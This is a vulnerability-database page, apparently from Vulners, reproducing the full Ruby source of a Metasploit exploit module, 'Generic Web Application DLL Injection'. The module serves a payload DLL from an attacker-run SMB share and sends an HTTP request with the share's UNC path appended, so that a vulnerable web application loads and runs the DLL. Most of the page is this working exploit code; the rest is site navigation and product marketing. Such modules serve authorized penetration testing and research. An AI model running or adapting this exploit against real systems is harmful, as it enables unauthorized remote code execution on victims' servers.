Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Generic Web Application DLL Injection

🗓️ 04 Mar 2015 22:18:45Reported by Matthew Hall <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 10 Views

This module exploits conditions where an HTTP request triggers a DLL load from a specified SMB share, serving payloads as DLLs over an SMB service to be triggered via an arbitrary HTTP URL

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => '2015-03-04'
      ))

      register_options(
        [
          OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
          OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
        ])

      deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    sploit = target_uri.to_s
    sploit << unc

    print_status("Trying to ")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
7.1High risk
Vulners AI Score7.1
http requestdll loadsmb sharepayloadssmb servicearbitrary urlwindowsexploitvulnerabilitymetasploithttp clientdlluri
10